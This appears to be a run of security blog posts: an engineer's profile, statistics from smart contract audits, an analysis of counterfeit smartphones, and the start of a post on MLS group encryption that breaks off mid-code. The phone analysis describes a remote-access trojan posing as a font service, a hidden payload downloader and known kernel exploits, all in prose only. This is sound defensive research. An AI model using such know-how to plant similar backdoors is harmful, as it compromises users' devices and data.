A Day in the Life of Alessandro Gario, Senior Security Engineer

People interested in joining Trail of Bits often ask us what it's like to work on the Engineering Services team. We felt the best answer would be to profile some of the talented individuals on our team and let them describe their experiences at Trail of Bits in their own words.

Today, we're featuring Alessandro Gario, a member of our Engineering Team who lives in Italy. Alessandro works on our open-source projects, implementing new functionality, reducing technical debt, and improving overall performance.

How did you end up at Trail of Bits?

I first learned of Trail of Bits in my Twitter feed. I was on the lookout for new opportunities, so I started sniffing around the company and learning about its many open-source projects. I began with McSema, a project for lifting compiled executables to LLVM IR. Originally I just wanted to try out the software, but I soon wanted to talk to the developers, so I ended up in the Empire Hacking Slack, where Trail of Bits engineers answer questions about their open-source work. My main contributions to the project were to the CMake code, improving the build experience and implementing better dependency management.

Dan Guido (CEO, Trail of Bits) noticed my contributions to McSema, and happened to have an immediate need for someone to work on osquery issues, so he made me an offer. Dan sent me a contract to work on a single task, and I officially became a Trail of Bits contractor! I had so much fun; it was the first time I was allowed so much freedom in working on a project — both in when I could work, and how I could direct my own tasking.

My contract ended when I finished the osquery task. With more time on my hands, it was now the perfect opportunity to engage more with the community, and take on the bugfixes and feature requests submitted by the users. Eventually, Trail of Bits had received enough requests for osquery work that they sent me a full-time job offer, and the rest is history.

What projects are you working on currently?

Primarily I am involved with the osquery project, having dedicated so much of my time to it that I was accepted as a member of the five-person committee of maintainers! The project, and especially its build toolchain, is currently being renovated to operate independently of its old home at Facebook.

I also provide Qt SDK UI work for an internal project where we are creating a powerful source code navigation and cross-referencing utility for security auditors. Beyond that, I occasionally help out our other projects with their CMake-related issues.

On the side, I’ve continued to pursue experiments with how to fit eBPF into osquery, which is part of an ongoing effort to improve osquery’s event-driven detection capability on Linux. I recently spoke on this topic at QueryCon.

How do you schedule your workday?

Any kind of collaboration requires me to align my schedule with the rest of the team, and because of the time zone differences I have to be flexible; a strict 9am-6pm shift wouldn't really work. I organize my workday around my preferred schedule, but also around the US-based Trail of Bits employees and customers who are six to nine hours behind me here in Italy. When it's late afternoon in New York, it's nighttime in Milan. Most of my meetings fall around 5pm or 6pm my time, which suits me. It has never been a problem; I really like the schedule.

What are the most challenging aspects of your job?

Sometimes a task's requirements, at least as the task is initially envisioned, are hard to implement due to hard technical or design constraints. That's difficult, because you have to find a creative compromise that works for everyone.

On the rare occasions that I get stuck, I get help from the team. Our Slack channels are like a mini StackOverflow: you can just ask, and get immediate answers from experts. That is one of the great things about working here.

When contributing to any open-source project with external maintainers, you will eventually have to work with people outside the company to finish your job and get the work integrated into the next release. Sometimes, you have to work a little extra after you think the task is “finished,” because you still have to work with the upstream project to make everyone happy.

What is the most rewarding aspect of your work at Trail of Bits?

I was always interested in information security. I would look at Twitter and see all of these conferences, events, and people who were building great things. I am finally able to travel to these events and meet these people. I even gave my first conference talk last month, at QueryCon!

I am exposed to challenging issues that make me learn, especially when I get other people at the company involved. The ability to work with, and learn from, a talented group of experienced engineers is a reward in itself.

When I am given a task, I am trusted with the responsibility to see it through to the end, and work on it on my own. I do my best work and feel the most motivated when I am trusted this way.

What is some career advice for someone who wants to join us here?

Whenever I sought positions in the security engineering field, they seemed to be mostly for external pen-testing of web services, which wasn't particularly interesting to me. I've done a little bit of reverse engineering and CTFs, but vulnerability research is not really my field either. I like to apply my engineering skills to building software. I've decided that you have to actively seek something that challenges and interests you, and carve out your own opportunity.

My advice is to find a relevant project you would like to support, and look for easy issues to solve, or even just review an open Pull Request, or improve the documentation. Once you get to know the project, it becomes easier to start contributing cool changes.

This is exactly what has worked for me personally. I know it is hard, because most people don’t have the time for after-hours work. And there’s no guarantee that you will get hired. But choose projects that are intrinsically motivating to you, and keep doing cool stuff as much as possible in your spare time. Have fun, and in the end you will get noticed.

The Engineering Services Team is Hiring

We appreciate Alessandro taking the time from his projects to talk about what it’s like to work here. Our Engineering Services Team is distributed around the globe, and each of our engineers brings a unique set of skills and contributions. Our work is public-facing, open-source, and client-driven. In close partnership with our customers, we are continuously working to extend and improve endpoint security solutions like osquery, Santa, and gVisor. Our recent work includes the implementation of 2FA support within PyPI, the Python package management system. We contribute to security event alerting pipeline projects like StreamAlert or the Carbon Black API, and are always working to improve our own security analysis tools like McSema and Remill. Our customers rely on us to solve their open-source security software challenges.

We are currently hiring for another Senior Security Engineer. Please apply if you are interested and feel you are qualified!

246 Findings From our Smart Contract Audits: An Executive Summary

Until now, smart contract security researchers (and developers) have been frustrated by limited information about the actual flaws that survive serious development efforts. That limitation increases the risk of making critical smart contracts vulnerable, misallocating resources for risk reduction, and missing opportunities to employ automated analysis tools. We’re changing that. Today, Trail of Bits is disclosing the aggregate data from every full smart contract security review we’ve ever done. The most surprising and impactful results we extracted from our analysis are:

  • Smart contract vulnerabilities are more like vulnerabilities in other systems than the literature would suggest.
  • A large portion (about 78%) of the most important flaws (those with severe consequences that are also easy to exploit) could probably be detected using automated static or dynamic analysis tools.
  • On the other hand, almost 50% of findings are not likely to ever be found by any automated tools, even if the state of the art advances significantly.
  • Finally, manually produced unit tests, even extensive ones, likely offer either weak or, at worst, no protection against the flaws an expert auditor can find.

Continue reading this post for a summary of our study and more details on these results.

Everyone wants to prevent disastrous vulnerabilities in Ethereum smart contracts. Academic researchers have supported that effort by describing some categories of smart contract vulnerabilities. However, the research literature and most online discourse are usually focused on understanding a relatively small number of real-world exploits, typically with a bias towards the highly visible. For example, reentrancy bugs are widely discussed because they were responsible for the infamous DAO attack and are somewhat unique to smart contracts. However, is reentrancy the most common serious problem in real smart contracts? If we don't know, then we cannot effectively allocate resources to preventing smart contract vulnerabilities. It's not enough to understand detection techniques. We have to know how and where to apply them. Smart contracts are new. Decision makers have a relatively shallow pool of developer/analyst experience upon which to base their actions. Having real data to draw conclusions from is essential.

So, we collected the findings from the full final reports for twenty-three paid security audits of smart contract code we performed, five of which have been kept private. The public audit reports are available online, and make informative reading. We categorized all 246 smart-contract related findings from these reports, in some cases correcting the original audit categorization for consistency, and we considered the potential for both static and dynamic analysis tools, in the long run, to detect each finding. We also compared the frequencies of categories to those for fifteen non-smart-contract audits we performed. Using paid, expert audits of code means our statistics aren't overwhelmed by the large number of relatively silly contracts on the blockchain. Using many audit findings instead of a handful of exploited vulnerabilities gives us a better picture of potential problems to keep watch for in the future.

Category Frequencies are Different than Other Audits… But Not as Much as You’d Think

The most common type of smart contract finding is also the most common kind of finding in the fifteen non-smart-contract audits we examined for comparison: data validation flaws are extremely common in every setting, constituting 36% of smart contract findings and 53% of non-smart-contract findings. This is no surprise; accepting inputs that should be rejected, and that lead to bad behavior, will always be easy to do and always be dangerous. Access control is another common source of problems in smart contracts (10% of findings) and in the other systems we audited (18%); it's easy to accidentally be too permissive, and access control can also be disastrous if too restrictive (for example, when a contract bug prevents even the owner of a contract from performing critical maintenance tasks in some states).

Some categories of problems are much less common in smart contracts: unsurprisingly, denial of service, configuration, and cryptography issues are less frequent in a context where the blockchain abstracts away communication issues and operating system/platform-specific behavior changes, and gas limits reduce the temptation to roll your own cryptography. Data exposure problems are also less common in smart contracts; most developers seem to understand that data on the blockchain is inherently public, so there seem to be fewer misunderstandings about the consequences of "surprise" visibility. But these cases are somewhat unusual; for a majority of finding types, including overflow/underflow and arithmetic precision, patching, authentication, timing, error reporting, and auditing and logging, the percentages in findings are within 10% of those for non-smart-contract audits.

The Worst of the Worst

In addition to counting how many findings there were in each category, we looked at how serious those findings tended to be: their potential severity, and the difficulty for an attacker to exploit them. We refer to the worst findings as high-low: high severity, low difficulty. These issues can allow an attacker to inflict major damage with relative ease.

Many of our twenty-two categories had no high-low findings, but a small number had high-low rates greater than 10%: access controls (25% high-low), authentication (25%), timing (25%), numerics (23%), undefined behavior (23%), data validation (11%), and patching (11%). Note that the much-dreaded reentrancy, while often serious (50% of reentrancy findings were high severity), had no high-low findings at all, and accounted for only 4 of the 246 total findings.

Tools and Automation: We Can Do a Lot Better

For each finding, we determined, to the best of our knowledge, if it could potentially be detected by automated static analysis (e.g., our Slither tool), using a reasonable detector without too many false positives, or by automated dynamic analysis (e.g., with property-based testing like Echidna or symbolic execution like Manticore), either with off-the-shelf properties like standard ERC20 semantics, or using custom invariants. Rather than restricting ourselves to current tools, we looked to the future, and rated a finding as detectable if a tool that could be produced with significant engineering effort, but without unprecedented advances in the state of the art in software analysis, could potentially find the problem. That is, we asked "could we write a tool that would find this, given time and money?" not "can current tools definitely find this?" Obviously, this is a somewhat subjective process, and our exact numbers should not be taken as definitive; however, we believe they are reasonable approximations, based on careful consideration of each individual finding, and our knowledge of the possibilities of automated tools.

Using this standard, 26% of the full set of findings could likely be detected using feasible static approaches, and 37% using dynamic methods (though usually only with the addition of a custom property to check). However, the potential for automated tools is much better when we restrict our attention to only the worst, high-low, findings. While static tools have less potential for detecting high-low findings than dynamic ones (33% vs. 63%), four of the high-low issues could probably only be detected by static analysis tools, which are also much easier to apply, and require less user effort. Combining both approaches, in the best-case scenario, would result in automatic detection of 21 of the 27 high-low findings: almost 78% of the most important findings. Our estimates of how effective static or dynamic analysis tools might be, in the limit, also vary widely by the kind of finding:

Category             Dynamic  Static
Access controls        50%      4%
API inconsistency       0%      0%
Auditing/logging        0%     38%
Authentication         25%      0%
Code quality            0%     67%
Coding bug             67%     50%
Configuration           0%      0%
Cryptography            0%    100%
Data exposure           0%      0%
Data validation        57%     22%
Denial of service      40%      0%
Documentation           0%      0%
Error reporting        29%     14%
Front-running           0%      0%
Logic                   0%      0%
Missing logic          67%      0%
Numerics               46%     69%
Patching               17%     33%
Race condition          6%     59%
Reentrancy             75%    100%
Timing                 50%     25%
Undefined behavior      0%     31%

Of course, in some cases, these percentages are not particularly informative; for instance, there was only one cryptography finding in our audit set, so it isn’t safe to assume that all cryptography bugs are easy to catch with a static analysis tool. Similarly, the coding bug category, containing what amount to “typos” in code, is likely to have an even higher percentage of easily statically detected problems, but there were only a handful of such problems in our audits.

Our best guess is that the combination of major impact on system behavior (thus high severity) and low difficulty (thus easy to find, in some sense) is not only a boon to would-be attackers, but a big help to automated analysis tools. That’s good news. Ongoing efforts to improve smart contract analysis tools are well worth the effort. That’s part of our motivation in releasing Crytic, a kind of Travis CI for smart contracts — with built-in support for running static analysis (including some Slither detectors not yet available in the public release) and, soon, dynamic analysis, on your code, automatically.

Perhaps the most important upshot here is that using high-quality automated static analysis is a best practice with almost no downside. If you’re writing important smart contracts, looking at a relatively small number of false positives in order to detect, with almost no developer effort, some of the most critical flaws is simply the right thing to do.
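To make the "almost no developer effort" point concrete, here is a minimal, hedged sketch of wiring Slither into a plain script rather than a pipeline product like Crytic. It assumes the slither-analyzer Python package, a compatible solc on your PATH, and a hypothetical MyToken.sol; attribute names follow recent Slither releases, so treat it as an illustration rather than a drop-in tool.

```python
# Minimal sketch: use Slither's Python API to flag externally reachable
# functions that write contract state, as a crude triage of attack surface.
# Assumes `pip install slither-analyzer`, a compatible solc, and a
# hypothetical MyToken.sol; not a replacement for Slither's own detectors.
from slither import Slither

slither = Slither("MyToken.sol")  # compiles the target and builds Slither's IR

for contract in slither.contracts:
    for function in contract.functions:
        if function.visibility in ("public", "external") and function.state_variables_written:
            written = ", ".join(v.name for v in function.state_variables_written)
            print(f"{contract.name}.{function.name} writes: {written}")
```

In practice you would simply run the slither CLI, which runs its full detector suite, in CI and fail the build on findings; the sketch above only shows how little glue such automation requires.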

Tools and Automation: No Silver Bullet

However, a lot of the findings (almost 49%) are almost impossible to imagine detecting with a tool. In most of these cases, in fact, a tool isn’t even very likely to help. Slither’s code understanding features may assist in finding some issues, but many problems, and almost a quarter of the most important problems, require deeper understanding of the larger context of blockchains and markets. For example, tools can’t inform you about most front-running. Problems requiring human attention are not limited to the obvious categories, such as front-running, configuration, and documentation, either: there are 35 data validation findings, 12 access controls findings, and 10 undefined behavior findings, for example, that are unlikely to be detectable by automated tools – and 3 of these are high-low findings. A full 35% of high severity findings are unlikely to be detected automatically.

Even in the best of possible near-future automated tool worlds, and even with full formal verification (which might take up to 9x the developer effort), a great many problems simply require human attention. Security is a Strong-AI Hard problem. Until the robots replace us, independent expert attention will remain a key component of security for the most essential contracts.

Unit Tests are Great… But Maybe Not For This

Finally, what about unit testing? We didn’t add any unit tests during our audits, but we can look at whether the presence of significant unit tests was correlated with fewer findings during audits, or at least fewer high-low findings. The number of data points is, of course, too small to draw any solid conclusions, but we didn’t find any statistically significant correlation between our estimate of unit test quantity and quality and the presence of either findings in general or high-low findings. In fact, the insignificant relationships we did detect were in the wrong direction: more unit tests means more problems (the positive relationship was at least weaker for high-low findings, which is comforting). We hope and believe that’s just noise, or the result of some confounding factor, such as a larger attack surface for more complex contracts. While our basis for this result is subject to a number of caveats, including our ability to gauge the quality of unit tests without examining each line of code in detail, we do believe that if there were a causal relationship between better unit tests and fewer audit findings, with a large and consistent effect size, we’d have seen better evidence for it than we did.

Obviously, this doesn’t mean you shouldn’t write unit tests! It means that the kinds of things attackers and auditors are looking for may not overlap significantly with the kinds of problems unit tests help you avoid. Unit testing can probably improve your development process and make your users happier, but it may not help you actually be much more secure. It’s widely known that the problems developers can imagine happening, and write unit tests to check for, do not often overlap with the problems that cause security vulnerabilities. That’s why fuzzing and property-based testing are so valuable.

One key point to take away here is that the bugs found by property-based testing can be added as new unit tests to your code, giving you the best of both worlds. The pyfakefs module for creating high-fidelity mock file systems in Python, originally developed at Google, was a widely used software system, with a fairly extensive set of well-written unit tests. However, using the TSTL property-based testing tool for Python revealed over 100 previously undetected problems in pyfakefs (all of which were fixed), and let the developers of pyfakefs add a large number of new, more powerful, unit tests to detect regressions and new bugs. The same workflow can be highly effective with a well-unit-tested smart contract and Echidna; in fact, it can be easier, because Echidna does a better job of automatically figuring out the public interface to a contract than most property-based testing tools do when interacting with a library API.
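To make that workflow concrete, here is a minimal, hypothetical sketch in Python using the hypothesis property-based testing library (not Echidna or TSTL, and not smart contract code): a property test discovers a counterexample for a deliberately buggy toy function, and that counterexample is then pinned as an ordinary regression unit test.

```python
# Minimal sketch of the "property test finds a bug, bug becomes a unit test" loop,
# using the hypothesis library and a deliberately buggy toy function.
from hypothesis import given, strategies as st


def clamp(value, low, high):
    """Intended to clamp value into [low, high]; buggy when value < low."""
    if value > high:
        return high
    return value  # bug: forgets to enforce the lower bound


@given(st.integers(), st.integers(), st.integers())
def test_clamp_property(value, low, high):
    if low > high:
        return  # skip ill-formed ranges
    result = clamp(value, low, high)
    # hypothesis quickly finds a counterexample such as value=-1, low=0, high=0
    assert low <= result <= high


def test_clamp_regression():
    # The counterexample found above, pinned as a plain unit test so the
    # bug stays fixed even if the property test is later removed.
    assert clamp(-1, 0, 0) == 0
```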

Stay Tuned for More Details

We’ll be publishing the full results after we add a few more of our own smaller-scale audits and validate our results by comparing to estimates for audits performed by other companies. In the meantime, use our preliminary results to inform your own thinking about defects in smart contracts.

From The Depths Of Counterfeit Smartphones

In an age of online second-hand retailers, marketplace exchanges, and third-party refurb shops, it's easier than ever to save hundreds of dollars when buying a phone. These channels provide an appealing alternative for people forgoing a retail shopping experience for a hefty discount.

However, there is an additional option for those bargain hunters seeking even more savings: counterfeits of popular phone models. These knock-offs have become a burgeoning industry, transforming cheap hardware and free software into mass profits at almost no cost to the manufacturers. These clones often sell for less than a tenth of the retail price and are very convincing replicas at first glance.

Last year, we helped Vice's Motherboard with an investigative teardown of a counterfeit iPhone X. We were haunted by the many security concerns and vulnerabilities we'd discovered, so we worked with DeviceAssure, a company dedicated to anti-counterfeit solutions for mobile platforms, to do a deeper dive into these dangerous duplicates.

This post details what we found and provides some insight into exactly what you are getting when you use one of these phones. Whether it’s intentional malice or just dangerous ineptitude, there is plenty to be concerned about!

First Impressions

We looked at two counterfeits: an iPhone 6 and a Samsung S10.

Front and back of the counterfeit iPhone

Front and back of counterfeit Samsung S10

The visual aesthetic of the devices is very convincing. The peripheral layout, dimensions, and overall finish are almost identical to their retail counterparts. The various switches and buttons correspond to what you would expect in the real devices to control the phone lock, adjust the volume, and turn them on and off. The counterfeit iPhone even uses a Lightning cable in its charge port!

Both models are equipped with haptic feedback and fingerprint sensors that do indeed work … mostly. Facial biometrics are also included, though they had a considerably higher failure rate and would often not work at all.

From an initial glance at the underlying guts, both devices rely on controllers from Mediatek, a Taiwanese hardware company that provides an ARM chipset for embedded devices that is both incredibly cheap and reasonably capable. They also rely, as many counterfeits do, on custom, largely community-built ROMs of the Android runtime: a telltale sign that functionality will be non-standard and rife with variant-specific quirks.

The Good – They look and work somewhat like the real thing… sometimes

You get a phone that looks and works vaguely like the one it counterfeited, with a few exceptions. What’s good other than that?

Nothing.

No really, even if these devices had hypothetically sported pristine ROMs (which, hint: they didn’t), they still came with a slew of critical problems, even if they weren’t outright backdoored with preinstalled malware (which, hint: they were).

We can give a C+ for effort to some of the detail rendered into the system UI. A good majority of modal popups and settings panels are faithfully intercepted and recreated using extensions to the native resource framework.

In particular, the Samsung counterfeit uses the native launcher, UI/icon pack, and theming engine for its variant of Android; it is almost indistinguishable from the original. It even includes legitimate portals for both the Samsung and Google Play app stores.

The iPhone, however, quickly falls apart after minutes of exploration. The ROM system layer initially presents a believable iOS UI, but edge cases in event behaviors (WiFi connection errors, application exceptions, certain input text types, etc.) reveal stock Android screens. In addition, the "iOS" apps all display in noticeably low resolution and contain creatively broken English (in stark contrast to the ROM system layer, suggesting separate authors).

The Bad – They are full of unpatched vulnerabilities and insecure bloatware

Both phones report running the latest version of Android, 9.0 Pie, a relatively hardened OS in most regards. However, neither claim is true.

In the case of the iPhone, further digging revealed that it runs a far older version of Android: KitKat 4.4.0. KitKat's last update came in 2014. As you can imagine, hundreds of CVEs have appeared since then, not to mention inherent design flaws that have since been reworked: sandbox mechanisms, file system partitions, and dangerous permission APIs, to name a few.

We probed a few well-known weaknesses and confirmed they were unpatched. The device is susceptible to the notorious Stagefright bugs, which exploit media processing of SMS/MMS messages to gain remote control of the device. In addition, several old Android system daemons, including mediaserver and SurfaceFlinger, exhibited known unpatched vulnerabilities. Because these AOSP ROMs are compiled out-of-band and maintained ad hoc in the depths of board-hacking and system-modding forums, it is unlikely that users could ever patch them themselves. There is certainly no over-the-air upgrade capability.

The S10 runs a slightly newer Android: Lollipop 5.1, last updated in 2015. Lollipop replaced the Dalvik VM with the modern ART runtime and added Material Design theming elements, which is what allows our counterfeit to use the Samsung UI components.

However, there is an even more serious problem that plagues both phones: outdated kernels. Beyond the Android runtime itself, the Linux kernel in Android phones typically requires vendor participation to push security fixes downstream onto the phone. Even in legitimate Android devices, this process often lags behind security releases and requires additional engineering effort from the vendor. The volunteer community of Mediatek ROM maintainers isn't going to keep up with daily security updates, so outdated kernels in counterfeits are inevitable. Both phones had vulnerable kernels that were successfully exploited using known bugs, like DirtyCow (a copy-on-write memory race condition) and Towelroot (a futex bug ported to Android). No doubt a wide host of other kernel bugs are available for a potential attacker to abuse.

The Mediatek device drivers and daemons are an abundant source of vulnerabilities as well, often leading to kernel-level code execution. Again, it is highly unlikely that a user would be able to find and patch these components themselves.

Another pitfall of these phones is the presence of debug and testing utilities in the Mediatek baseline ROM packages that expose dangerous system-level permissions. We observed this on both of these devices, as well as on multiple other counterfeit variants we've researched. The Galaxy S10 counterfeit features a remote debugging server that allows remote control over media files, logging of SMS messages, and deletion of phone numbers.

The Mediatek Android daemon (MTKAndroidSuite package) on the Galaxy S10 counterfeit starts a local FTP server that can be used to manipulate files due to the elevated permissions of the service.

Still on the S10, incoming SMS messages are saved to the application's SQLite database, which is not protected by access controls and can be read by other applications.

An overview displaying some of the Mediatek daemon capabilities (as indicated via class filenames) shows that the daemon can also retrieve media files, dump phone contacts, delete messages from the phone, and more.

These counterfeits are undeniably insecure. Both lie about their Android versions. The ROM versions used were severely outdated and vulnerable to public exploits, as were their kernels. They include bloatware, like remote debugging services, that enable abuse. This is what you’d expect from a phone that’s built around a volunteer-maintained, outdated Android ROM.

The ability for vendors and developers to seamlessly integrate and enforce security updates across their devices has been a massive win for mobile security. This requires a larger ecosystem that extends beyond the phone itself. Not only are these clones lacking in the latest and greatest hardware mitigations, but being isolated from the larger ecosystem and its security safety net is an inherent risk that can never truly be mitigated by these knockoffs.

The Ugly – They contain malware and rootkits

Both the Galaxy S10 and iPhone 6 counterfeits we assessed contained malware and rootkits.

The first issue we noticed in both devices was the presence of Umeng, an invasive analytics library, embedded in many of the applications and system libraries. Based out of China, Umeng has been caught employing malware in its operations. It regularly collects and sends user information, including name, gender, IMEI numbers, serial numbers, and more, back to its servers without prompting any of the usual permission-consent disclaimers.

In the case of the S10, we found the SystemUI framework was modified to embed a server that can arbitrarily download, install, and run .dex files, in addition to reporting event information collected from system events such as geolocation, contact creation, and package installation and removal. For example, the library components used for facial recognition came bundled with functionality that can install arbitrary Android applications on demand.

On the S10, a hidden component in the SystemUI downloads files off the internet in the background. Note the Mandarin logs at the bottom of the screenshot!

Monitoring the S10’s network activity, we found it periodically reaching out to an unknown server. This is the origin of those requests, found embedded inside the SystemUI framework library.

One example of a component that has the capability to install additional applications on-demand in the facial recognition software. “ReadFace” is a third-party library, integrated inside the SystemUI framework, that seems to simulate biometric facial recognition. Within this code, it seems that there is the ability to arbitrarily install APKs.

Finally, the S10 included a RAT masquerading as a font extension system service (“LovelyFonts”) that allows for remote native code execution, complete with a shell, arbitrary file upload/download, and logging of system events. This RAT provides unlimited access to the person who planted it there, enabling total compromise of the phone and all its data. We observed that certain events, such as installing packages or sending text messages, would trigger connections to exchange encrypted payloads remotely related to this backdoor. As a note, while this specific malware wasn’t present on the particular iPhone 6 that we studied, we have encountered variants of it on other counterfeit iPhone ROMs in the past.

This is a function inside the Lovelyfonts library that invokes a direct system call. The Lovelyfonts service comes with a library that allows a remote user to execute code directly on the machine, bypassing the Android Runtime.

Here, the malware is saying that it’s trying to instantiate a “network interceptor,” ostensibly interfering with network traffic.

The RAT malware detects whenever an app is installed or uninstalled and generates an encrypted payload to send to a remote API server.

Insecure, outdated ROMs are bad. Actual evidence of malicious intent is ugly. The phones we looked at both had Umeng, a known invasive analytics library that steals user data, embedded in multiple applications. The S10 had a server embedded in the SystemUI framework that can download, install, and run applications and collect system data, and it had malware that grants unlimited access to the device to whoever planted it there.

The moral of the story? If you're using a counterfeit phone, there's a high likelihood that it will provide bad actors access to your data by design. Embedding malware here is easy: it is trivial for a counterfeit manufacturer to implant and modify the ROM before distribution, and tracking or detecting either action is impossible for most users. While it is theoretically possible to find a 'clean' distribution, it is a gamble to take, never mind the inherent risk of using an insecure baseline system.

Conclusion – If you used one of these phones, you’d already be hacked

As the price point for handheld devices continues to climb, there will always be a temptation to seek cheaper alternatives. Counterfeit smartphones will continue to evolve in sophistication, performance, and threat to users. Using them puts your data at risk and may enable abuse of the applications and networks that you access and use.

Oftentimes, it's not obvious to buyers that they're purchasing counterfeits. Fake versions like these are often acquired through Craigslist or other third parties. Some are sold as scam upgrades or gifts. In some countries, it can be difficult to distinguish genuine sellers from counterfeit vendors because all phones are purchased independently of cellular contracts. Buying direct from Apple or Samsung is the best way to ensure nothing malicious comes preinstalled on your phone, and it enables you to receive new software updates that patch security issues (well, at least theoretically). If you're a company that allows employees to access corporate data on their phones, consider verifying that devices run genuine software.

We hope that this investigation helped illuminate the dangers of opting into an “off-brand” device. If this was helpful, or sounds similar to a security concern you or your organization confront, reach out! We offer a wide range of services, including iVerify – a personal security app for iOS – for further securing your phone.

We'd like to again thank DeviceAssure for reaching out and providing us with the hardware to conduct this analysis, as well as the opportunity to do some digging into this matter. They will be at Black Hat this year and so will some of us, so stop by and say hi. And as always, we love to hear about weird and strange products out there in the wild, so drop a line if there is something you think we should look at!

Better Encrypted Group Chat

Broadly, an end-to-end encrypted messaging protocol is one that ensures that only the participants in a conversation, and no intermediate servers, routers, or relay systems, can read and write messages. An end-to-end encrypted group messaging protocol is one that ensures this for all participants in a conversation of three or more people.

End-to-end encrypted group messaging is a necessary problem to solve. Whether it be for limiting liability, providing verifiable client-side security, or removing a single point of failure, there are good reasons for a group messaging host to use an end-to-end encrypted protocol.

End-to-end encrypted group messaging is also a hard problem to solve. Existing solutions such as Signal, WhatsApp, and iMessage have inherent problems with scaling, which I'll discuss in detail, that make it infeasible to conduct group chats of more than a few hundred people. The Message Layer Security (MLS) protocol aims to make end-to-end encrypted group chat more efficient while still providing security guarantees like forward secrecy and post-compromise security.¹

To these ends, I’ve been working on molasses, a Rust implementation of MLS, designed with safety, ease-of-use, and difficulty-of-misuse in mind.

Molasses has helped refine the MLS spec

The primary contribution of molasses has been in detecting errors in the specification and other implementations through unit and interoperability testing. Molasses implements most of MLS draft 6. Why not all of draft 6? There was an error in the spec that made it impossible for members to be added to any group. This broke all the unit tests that create non-trivial groups. Errors like this are hard to catch just by reading the spec; they require some amount of automated digging. Once they are found, the necessary revisions tend to be pretty obvious, and they are swiftly incorporated into the subsequent draft.

Iterating this discovery/patching process using molasses has given me a chance to put the spec through its paces and help make things clearer. This winter internship (“winternship”) project has been a great experience, especially as a first-time IETF contributor.

How to build encrypted group chat

In this section we derive why MLS is constructed the way it is (hint: for efficiency reasons), and how it compares to other solutions (hint: it’s better).

First off, MLS works at a lower level than most chat applications: it is a protocol upon which applications can be built. For example, MLS does not govern group permissions such as who can add people to the chat (this would be done by an application using MLS under the hood). Thus, we can leave things like formal rule systems out of the conversation entirely when analyzing the protocol. Here, we're only going to consider the sending of messages and the removal of members.

The following section makes use of cryptographic primitives such as digital signatures, Diffie-Hellman key exchange, (a)symmetric encryption, and key-derivation functions. If the reader feels underprepared in any of these areas, a quick skim of the sections in Serious Cryptography on ECIES and Authenticated Diffie-Hellman should be sufficient.

Without further ado,

A Motivating Problem

Wilna is planning a retirement party for an acquaintance, Vince. The logistics are a nightmare, so she invites her friends Xavier, Yolanda, and Zayne to help her plan. They would like to make a group chat on Slack so they can all stay on the same page, but they remember that Vince is an infrastructure manager for Slack—he can see all the messages sent over any Slack server in the world. This is a problem, since they want to give Vince a nice long vacation upstate and they want it to be a surprise. Vince’s position poses even more problems: he happens to manage every single server in town. Even if Wilna purchases her own server to mediate the group chat, Vince will be tasked with managing it, meaning that he can read everything the server stores.

What Wilna needs is a centralized end-to-end encrypted group chat, i.e., a group chat where every member can broadcast messages and read all incoming messages, but the single server that mediates these messages cannot read anything. For clarity, we’ll distinguish between application messages, which carry the textual content of what a group member wants to say to everyone else in the group, and auxiliary messages (called “Handshake messages” in MLS), which members use to manage group membership and cryptographic secrets. Since this is all mediated through one server, the members can rely on the server to broadcast their messages to the rest of the group.

With the setup out of the way, what are the options?

Solution #1: Pairwise Channels

Suppose Wilna, Xavier, Yolanda, and Zayne all know each other’s public keys for digital signatures. This means that each pair of people can do an authenticated Diffie-Hellman key exchange over some auxiliary messages and derive a shared symmetric key called the pair key. This process produces six separate pairwise channels, represented here:

If Wilna wants to send an application message m to the group, she has to encrypt it three separate times (once for each member of the group) and send all the ciphertexts:

The grey arrows represent application messages encrypted under a symmetric key.

Note that Wilna isn't making use of the server's ability to broadcast messages, since each member in the group can only decrypt messages encrypted under their own pair keys. Generalizing this, if there is a group of size N, sending an application message requires a member to encrypt and send N-1 times. Roughly speaking, this is how iMessage does group chat.²
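As a minimal sketch of this pairwise scheme, using X25519 and HKDF from Python's cryptography package (real iMessage sessions are far more involved, and all the private keys live in one dictionary here purely for demonstration):

```python
# Minimal sketch of pairwise channels: each pair derives a shared "pair key"
# via Diffie-Hellman, and a sender encrypts each message once per recipient.
# All private keys live in one dict purely for demonstration purposes.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

members = ["Wilna", "Xavier", "Yolanda", "Zayne"]
identity = {name: X25519PrivateKey.generate() for name in members}

def pair_key(me, peer):
    # The authentication step (verifying signatures) is elided; this is
    # just the Diffie-Hellman agreement plus a KDF.
    shared = identity[me].exchange(identity[peer].public_key())
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                info=b"pair key").derive(shared)

def send(sender, plaintext):
    # One encryption per recipient: N-1 ciphertexts for a group of size N.
    ciphertexts = {}
    for peer in members:
        if peer != sender:
            nonce = os.urandom(12)
            ciphertexts[peer] = (nonce,
                                 AESGCM(pair_key(sender, peer)).encrypt(nonce, plaintext, None))
    return ciphertexts

print(len(send("Wilna", b"Party planning update")))  # 3 encryptions for a group of 4
```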

Great, so that's just three encryptions per person. This probably takes at most a few milliseconds on a phone. What's the issue? The issue is: what about the WhatsApp group with >10,000 members where my aunts talk about who's getting married next? Do you want them to do 9,999 encryptions every time they send something? I do, but they probably don't. To accommodate my aunts, we need to get cleverer.

Solution #2: Sender Keys

Instead of having a key between every pair of users in the group, let's give every user a sender key that they use to encrypt application messages. This is roughly what Signal², WhatsApp², and Keybase do. If you're a group member, you have to go through the following setup:

  1. Randomly generate your sender key
  2. For every user in the group, encrypt your sender key with your pair key that you share with that user
  3. Send every user their encrypted copy of your sender key as an auxiliary message

After the setup, which requires N-1 encryptions for each user in a group of size N (that's Θ(N²) total auxiliary messages), we finally see some efficient behavior. To send an application message m, Wilna does the following (the full flow is sketched in code after the list):

  1. Encrypts m with her sender key precisely once
  2. Broadcasts the ciphertext to the group
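In the same hedged, toy style as before, here is that sender-key flow end to end: an expensive one-time setup in which each member distributes a fresh sender key over the pairwise channels (reduced to pre-shared symmetric keys below for brevity), followed by a single symmetric encryption per application message.

```python
# Minimal sketch of the sender-key scheme: expensive one-time setup,
# then one symmetric encryption per application message.
import os
from itertools import combinations
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

members = ["Wilna", "Xavier", "Yolanda", "Zayne"]

# Stand-in for the pairwise channels of Solution #1: one pre-shared key per pair.
pair_keys = {frozenset(p): AESGCM.generate_key(bit_length=256)
             for p in combinations(members, 2)}

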